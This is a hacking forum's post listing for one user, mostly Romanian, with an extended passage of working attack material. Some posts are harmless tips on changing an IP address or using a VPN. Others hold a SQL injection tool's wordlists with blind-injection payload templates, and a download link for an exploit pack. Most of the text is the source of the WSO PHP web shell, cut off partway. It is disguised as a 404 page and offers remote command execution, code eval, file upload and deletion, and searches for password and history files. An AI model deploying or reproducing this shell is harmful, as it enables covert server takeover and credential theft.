Jump to content

LegioNRST

Active Members
  • Posts

    225
  • Joined

  • Last visited

Everything posted by LegioNRST

  1. 1. Click Start 2. Click Run 3. Type in cmd and hit ok (this open a Command Prompt) 4. Type ipconfig /release and press enter 5. Click Start, Control Panel, and open Network Connections 6. Find and Right click on the active Local Area Connection and choose Properties 7. Double-click on the Internet Protocol (TCP/IP) 8. Click on Use the following IP address 9. Enter a false IP like 123.123.123.123 10. Press Tab and the Subnet Mask section will populate with default numbers 11. Hit OK twice 12. Right click the active Local Area Connection again and choose Properties 13. Double-click on the Internet Protocol (TCP/IP) 14. Choose Obtain an IP address automatically 15. Hit OK twice 16. Go to What Is My IP to see if you have a new IP address Source: http://www.whatismyip.com/faq/how-to-change-your-ip-address.asp
  2. E bun tutorialul. Trebuie stiut cam tot ce scrie acolo.
  3. Puteai sai dai si tu mai multe detalii, sa dai un scan, sa pui o poza si sursa.
  4. Bun venit! Si da.."Succesuri"
  5. Am uitat sa pun sursa, am postat in graba ca trebuia sa plec.
  6. SecurityKISS Tunnel este un program care v? permite s? accesa?i internetul în ciuda restric?iilor locale. Deasemenea, acest program securizeaz? conexiunea dvs. ?i îi împiedic? pe ceilal?i s? vad? activitatea dvs. pe internet, mesageria instant, fi?ierele desc?rcate, informa?iile referitoare la cardul de credit sau orice altceva trimis prin intermediul internetului. SecurityKISS Tunnel restric?ioneaz? toate datele dvs. online prin intermediul unui tunnel impecabil de securitate astfel c? toate comunica?iile dvs. online (navigarea pe internet, email-uri, mesaje instant, VoIP, activitatea pe re?elele de socializare) sunt criptate. Download SecurityKISSsetup.rar @ UppIT Edit: Sursa: http://www.securitykiss.com/
  7. Injector.
  8. Pune si sursa.
  9. LegioNRST

    Niste roots

  10. VirusTotal nu e bun pentru scan. De multe ori fail.
  11. Nu. Daca gasesc ceva o sa pun la edit.
  12. Columns: about access account accounts admin admin_id admin_name admin_pass admin_passwd admin_password admin_psw admin_pwd admin_user admin_userid admin_username adminemail adminid Administrateur Administrator administrator_name administrators adminlogin adminmail adminname adminpass adminpassword adminpaw adminpsw adminpwd admins AdminUID adminupass adminuser adminuserid adminusername adress aid Aide aim apwd ArticleID auid blog cc_number cc_owner cfg cid city client clientname clientpassword clients clientusername conf config content converge_pass_hash converge_pass_salt crack customer customers customers_password data db_hostname db_password db_username dw E-mail e_mail email emailaddress feed feedback gid glmm group hash id id_member images index isadmin key keywords last_login lastname log login login_admin login_name login_pass login_passwd login_password login_pw login_pwd login_user login_username logini loginkey logins logo mail md5hash mem_login mem_pass mem_passwd mem_password mem_pwd member member_id member_login_key member_name memberid membername members memlogin mempassword mima mm mpassword msn musername my_email my_name my_password my_username myname mypassword myusername name nc new news newsid note number Numer nummer p p_assword p_word pass pass1word pass_hash pass_w pass_word passer Passw passwd password Passwort passwrd pe_aduser pe_user phone POWER psw pswd pw pwd pwd1 pword pwrd qq sb_admin_name sb_pwd search sesskey setting sid spacer status Stocker store sysuser telephone temp_pass temp_password temppass temppasword text texte title u u_name uid un uname url user user1 user_admin user_email user_id user_ip user_level user_login user_n user_name user_pass user_passw user_passwd user_password user_pw user_pwd user_pword user_pwrd user_uname user_username user_usernm user_usernun user_usrnm useradmin userid userip Userlogin usern username user_name usernm userpass userpasswd userPassword userpw userpwd users usr usr2 usr_n usr_name usr_nusr usr_pass usr_pw usrn usrnam usrname usrnm usrpass usrs website wind wp_users xar_name xar_pass yh yhm yhmm yonghu WebPath: Stats/ ad/ ad_login/ ad_manage/ adm/ adm_login/ admin/ admin/default/ admin/index/ admin/login/ admin/manage/ admin1/ admin888/ admin_admin/ admin_login/ adminadmin/ administrator/ adminlogin/ amd/ article/admin/ backup/ chkadmin/ chklogin/ config/ database/ databases/ db/ dbase/ denglu/ eWebEditor/ editor/ files/ guanli/ houtai/ houtaiguanli/ htdocs/ htgl/ include/ includes/ incoming/ install/ login/ login1/ manage/ manager/ manager/login/ manual/ mrtg/ private/ public/ root/ secret/ secrets/ server-info/ server-status/ server_stats/ set/ setting/ setup/ snmp/ source/ sources/ sql/ statistics/ super/ superadmin/ sys_admin/ telephone/ temp/ temporary/ test/ tool/ tools/ up/ update/ upfile/ upload/ usage/ user/ users/ webadmin/ weblog/ weblogs/ webmaster/ webstats/ work/ wstats/ wwwlog/ wwwstats/ xtwh/ .htaccess pma/ phpMyAdmin/ ad_login{ext} ad_manage{ext} addmember{ext} adduser{ext} add_user{ext} add_file{ext} add_pic{ext} adm_login{ext} admin123{ext} admin1{ext} admin888{ext} admin_admin{ext} admin_delete{ext} admin_del{ext} admin_edit{ext} admin_index{ext} admin_login{ext} admin_main{ext} admin_user{ext} adminadduser{ext} admindefault{ext} admindelete{ext} admindel{ext} adminedit{ext} adminindex{ext} administrator{ext} adminlogin{ext} adminmanage{ext} adminmember{ext} admintab{ext} adminuserlogin{ext} adminuser{ext} admin{ext} ad{ext} aspcheck{ext} chkadmin{ext} chklogin{ext} config{ext} conn{ext} default{ext} delete{ext} denglu{ext} editmember{ext} edituser{ext} editor{ext} guanli{ext} houtaiguanli{ext} houtai{ext} htgl{ext} index_admin{ext} index_manage{ext} index{ext} left{ext} login_admin{ext} login_out{ext} login{ext} logout{ext} main{ext} manage_index{ext} manager{ext} manage{ext} members{ext} member{ext} menu{ext} top{ext} upfile{ext} upload{ext} up{ext} users{ext} user{ext} MySql: %20and%201=2%23 %20and%20(select%20char_length(<column>)%20from%20(select%20*%20from%20<database>.<table>%20order%20by%201%20limit%20<length>,1)%20t%20limit%201)%20between%20<min>%20and%20<temp>%20%23 %20and%20(select%20abs(ascii(substr(<column>,<index>,1)))%20from%20(select%20*%20from%20<database>.<table>%20order%20by%201%20limit%20<length>,1)%20t%20limit%201)%20between%20<min>%20and%20<temp>%20%23 Tables: a_admin account accounts ACT_INFO ad adm admin admin_login admin_name admin_pass admin_password admin_psw admin_pwd admin_user admin_userinfo admin_username administrator administrators adminname adminpass adminpassword adminpsw admins adminupass adminuser adminusername Art article Autor BBS book chat Client clients clubconfig cms_admin cms_admins cms_user cms_users company config Contact content contenu control controle Country customer customers dbadmins download dw Event gl glmm gly group guanli guanliyuan h_admin images Index info key keywords login logon logs m_admin main manage manager mb_users member memberlist members mima mm movie mpassword musername mybb_users mysql mysql.user name names nc new news order pass password passwords phpmyadmin.pma_table_info pma_table_info power powers psw pswd pw pwd pwd1 pwds reg_user reg_users reguser regusers root roots session setting settings site_login site_logins SITELOGIN sitelogins Subjects Superuser sys sysadmin sysadmins sysconstraints syssegments System systime sysuser sysusers table tables tb_admin tb_administrator tb_login tb_member tb_members tb_user tb_username tbl tbl_user tbl_users tbladmins tblConfigs tblUser test Titel u u_n u_name u_p u_pass uid user user_admin user_info user_list user_login user_name user_pw UserControl userinfo username usernames userpasswd userpassword userpwd users usr usr_pw usrs vb_user vip WebAdmin webadmins Webmaster webmasters webuser webusers x_admin yhm yhmm Virus Scan: Multi-Engine Antivirus Scanner - Services - NoVirusThanks.org Download Safe3SI.rar @ UppIT Edit: File scanned:
  13. Download Exploit.Union.rar @ UppIT Virus Scan: Multi-Engine Antivirus Scanner - Services - NoVirusThanks.org Edit: File Scanned:
  14. Folositor. Merge brici.
  15. Nu l-am testat.
  16. <?php /* WSO 2.1 (Web Shell by pgems.in) */ $auth_pass = "e48e13207341b6bffb7fb1622282247b"; $color = "#00ff00"; $default_action = 'FilesMan'; @define('SELF_PATH', __FILE__); if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { header('HTTP/1.0 404 Not Found'); exit; } @session_start(); @error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @set_time_limit(0); @set_magic_quotes_runtime(0); @define('VERSION', '2.1'); if( get_magic_quotes_gpc() ) { function stripslashes_array($array) { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); } $_POST = stripslashes_array($_POST); } function printLogin() { ?> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <hr> <address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address> <style> input { margin:0;background-color:#fff;border:1px solid #fff; } </style> <center> <form method=post> <input type=password name=pass> </form></center> <?php exit; } if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] )) if( empty( $auth_pass ) || ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) ) $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; else printLogin(); if( strtolower( substr(PHP_OS,0,3) ) == "win" ) $os = 'win'; else $os = 'nix'; $safe_mode = @ini_get('safe_mode'); $disable_functions = @ini_get('disable_functions'); $home_cwd = @getcwd(); if( isset( $_POST['c'] ) ) @chdir($_POST['c']); $cwd = @getcwd(); if( $os == 'win') { $home_cwd = str_replace("\\", "/", $home_cwd); $cwd = str_replace("\\", "/", $cwd); } if( $cwd[strlen($cwd)-1] != '/' ) $cwd .= '/'; if($os == 'win') $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" ); else $aliases = array( "List dir" => "ls -la", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" ); function printHeader() { if(empty($_POST['charset'])) $_POST['charset'] = "UTF-8"; global $color; ?> <html><head><meta http-equiv='Content-Type' content='text/html; charset=<?=$_POST['charset']?>'><title><?=$_SERVER['HTTP_HOST']?>- 404 Not Found Shell V.<?=VERSION?></title> <style> body {background-color:#000;color:#fff;} body,td,th { font: 9pt Lucida,Verdana;margin:0;vertical-align:top; } span,h1,a { color:<?=$color?> !important; } span { font-weight: bolder; } h1 { border:1px solid <?=$color?>;padding: 2px 5px;font: 14pt Verdana;margin:0px; } div.content { padding: 5px;margin-left:5px;} a { text-decoration:none; } a:hover { background:#ff0000; } .ml1 { border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea { width:100%;height:250px; } input, textarea, select { margin:0;color:#00ff00;background-color:#000;border:1px solid <?=$color?>; font: 9pt Monospace,"Courier New"; } form { margin:0px; } #toolsTbl { text-align:center; } .toolsInp { width: 80%; } .main th {text-align:left;} .main tr:hover{background-color:#5e5e5e;} .main td, th{vertical-align:middle;} pre {font-family:Courier,Monospace;} #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);} </style> <script> function set(a,c,p1,p2,p3,charset) { if(a != null)document.mf.a.value=a; if(c != null)document.mf.c.value=c; if(p1 != null)document.mf.p1.value=p1; if(p2 != null)document.mf.p2.value=p2; if(p3 != null)document.mf.p3.value=p3; if(charset != null)document.mf.charset.value=charset; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); document.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = "ajax=true"; for(i=0;i<document.mf.elements.length;i++) params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value); sr('<?=$_SERVER['REQUEST_URI'];?>', params); } function sr(url, params) { if (window.XMLHttpRequest) { req = new XMLHttpRequest(); req.onreadystatechange = processReqChange; req.open("POST", url, true); req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded"); req.send(params); } else if (window.ActiveXObject) { req = new ActiveXObject("Microsoft.XMLHTTP"); if (req) { req.onreadystatechange = processReqChange; req.open("POST", url, true); req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded"); req.send(params); } } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { //alert(req.responseText); var reg = new RegExp("(\\d+)([\\S\\s]*)", "m"); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert("Request error!"); } </script> <head><body><div style="position:absolute;width:100%;top:0;left:0;"> <form method=post name=mf style='display:none;'> <input type=hidden name=a value='<?=isset($_POST['a'])?$_POST['a']:''?>'> <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'> <input type=hidden name=p1 value='<?=isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''?>'> <input type=hidden name=p2 value='<?=isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''?>'> <input type=hidden name=p3 value='<?=isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''?>'> <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'> </form> <?php $freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_total_space($GLOBALS['cwd']); $totalSpace = $totalSpace?$totalSpace:1; $release = @php_uname('r'); $kernel = @php_uname('s'); $millink='http://milw0rm.com/search.php?dong='; if( strpos('Linux', $kernel) !== false ) $millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) ); else $millink .= urlencode( $kernel . ' ' . substr($release,0,3) ); if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(@posix_geteuid()); $gid = @posix_getgrgid(@posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n=count($path); for($i=0;$i<$n-1;$i++) { $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; for($j=0;$j<=$i;$j++) $cwd_links .= $path[$j].'/'; $cwd_links .= "\")'>".$path[$i]."/</a>"; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charsets = ''; foreach($charsets as $item) $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>'; $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network'); if(!empty($GLOBALS['auth_pass'])) $m['Logout'] = 'Logout'; $m['Self remove'] = 'SelfRemove'; $menu = ''; foreach($m as $k => $v) $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>'; $drives = ""; if ($GLOBALS['os'] == 'win') { foreach( range('a','z') as $drive ) if (is_dir($drive.':\\')) $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> '; } echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname<br>User<br>Php<br>Hdd<br>Cwd'.($GLOBALS['os'] == 'win'?'<br>Drives':'').'</span></td>'. '<td>:<nobr>'.substr(@php_uname(), 0, 120).' <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[milw0rm]</a></nobr><br>:'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' )<br>:'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=<?=$color?><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>:'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>:'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>:'.$drives.'</td>'. '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'. '<table cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div style="margin:5">'; } function printFooter() { $is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>"; ?> </div> <table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100%"> <tr> <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="<?=htmlspecialchars($GLOBALS['cwd']);?>"><input type=submit value=">>"></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td> </tr> <tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form><?=$is_writable?></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form><?=$is_writable?></td> </tr> <tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'> <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form><?=$is_writable?></td> </tr> </table> </div> </body></html> <?php } if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } } if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } } function ex($in) { $out = ''; if(function_exists('exec')) { @exec($in,$out); $out = @join("\n",$out); }elseif(function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); }elseif(function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); }elseif(function_exists('shell_exec')) { $out = shell_exec($in); }elseif(is_resource($f = @popen($in,"r"))) { $out = ""; while(!@feof($f)) $out .= fread($f,1024); pclose($f); } return $out; } function viewSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } function perms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } function viewPermsColor($f) { if (!@is_readable($f)) return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>'; elseif (!@is_writable($f)) return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>'; else return '<font color=#00BB00><b>'.perms(@fileperms($f)).'</b></font>'; } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) { $files[] = $filename; } return $files; } } function which($p) { $path = ex('which '.$p); if(!empty($path)) return $path; return false; } function actionSecInfo() { printHeader(); echo '<h1>Server security information</h1><div class=content>'; function showSecParam($n, $v) { $v = trim($v); if($v) { echo '<span>'.$n.': </span>'; if(strpos($v, "\n") === false) echo $v.'<br>'; else echo '<pre class=ml1>'.$v.'</pre>'; } } showSecParam('Server software', @getenv('SERVER_SOFTWARE')); showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none'); showSecParam('Open base dir', @ini_get('open_basedir')); showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); showSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); $temp=array(); if(function_exists('mysql_get_client_info')) $temp[] = "MySql (".mysql_get_client_info().")"; if(function_exists('mssql_connect')) $temp[] = "MSSQL"; if(function_exists('pg_connect')) $temp[] = "PostgreSQL"; if(function_exists('oci_connect')) $temp[] = "Oracle"; showSecParam('Supported databases', implode(', ', $temp)); echo '<br>'; if( $GLOBALS['os'] == 'nix' ) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no'); showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no'); showSecParam('OS version', @file_get_contents('/proc/version')); showSecParam('Distr name', @file_get_contents('/etc/issue.net')); if(!$GLOBALS['safe_mode']) { echo '<br>'; $temp=array(); foreach ($userful as $item) if(which($item)){$temp[]=$item;} showSecParam('Userful', implode(', ',$temp)); $temp=array(); foreach ($danger as $item) if(which($item)){$temp[]=$item;} showSecParam('Danger', implode(', ',$temp)); $temp=array(); foreach ($downloaders as $item) if(which($item)){$temp[]=$item;} showSecParam('Downloaders', implode(', ',$temp)); echo '<br/>'; showSecParam('Hosts', @file_get_contents('/etc/hosts')); showSecParam('HDD space', ex('df -h')); showSecParam('Mount options', @file_get_contents('/etc/fstab')); } } else { showSecParam('OS Version',ex('ver')); showSecParam('Account Settings',ex('net accounts')); showSecParam('User Accounts',ex('net user')); } echo '</div>'; printFooter(); } function actionPhp() { if( isset($_POST['ajax']) ) { $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; ob_start(); eval($_POST['p1']); $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; echo strlen($temp), "\n", $temp; exit; } printHeader(); if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) { echo '<h1>PHP info</h1><div class=content>'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace('!body {.*}!msiU','',$tmp); $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp); $tmp = preg_replace('!h1!msiU','h2',$tmp); $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp); echo $tmp; echo '</div><br>'; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">'; echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>'; if(!empty($_POST['p1'])) { ob_start(); eval($_POST['p1']); echo htmlspecialchars(ob_get_clean()); } echo '</pre></div>'; printFooter(); } function actionFilesMan() { printHeader(); echo '<h1>File manager</h1><div class=content>'; if(isset($_POST['p1'])) { switch($_POST['p1']) { case 'uploadFile': if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) echo "Can't upload file!"; break; break; case 'mkdir': if(!@mkdir($_POST['p2'])) echo "Can't create new dir"; break; case 'delete': function deleteDir($path) { $path = (substr($path,-1)=='/') ? $path:$path.'/'; $dh = opendir($path); while ( ($item = readdir($dh) ) !== false) { $item = $path.$item; if ( (basename($item) == "..") || (basename($item) == ".") ) continue; $type = filetype($item); if ($type == "dir") deleteDir($item); else @unlink($item); } closedir($dh); rmdir($path); } if(is_array(@$_POST['f'])) foreach($_POST['f'] as $f) { $f = urldecode($f); if(is_dir($f)) deleteDir($f); else @unlink($f); } break; case 'paste': if($_SESSION['act'] == 'copy') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = opendir($c.$s); while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.'/',$f, $d.$s.'/'); } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s); } } foreach($_SESSION['f'] as $f) copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']); } elseif($_SESSION['act'] == 'move') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = opendir($c.$s); while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.'/',$f, $d.$s.'/'); } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s); } } foreach($_SESSION['f'] as $f) @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f); } unset($_SESSION['f']); break; default: if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) { $_SESSION['act'] = @$_POST['p1']; $_SESSION['f'] = @$_POST['f']; foreach($_SESSION['f'] as $k => $f) $_SESSION['f'][$k] = urldecode($f); $_SESSION['cwd'] = @$_POST['c']; } break; } echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>'; } $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); if($dirContent === false) { echo 'Can\'t open this folder!'; return; } global $sort; $sort = array('name', 1); if(!empty($_POST['p1'])) { if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]); } ?> <script> function sa() { for(i=0;i<document.files.elements.length;i++) if(document.files.elements[i].type == 'checkbox') document.files.elements[i].checked = document.files.elements[0].checked; } </script> <table width='100%' class='main' cellspacing='0' cellpadding='2'> <form name=files method=post> <?php echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' 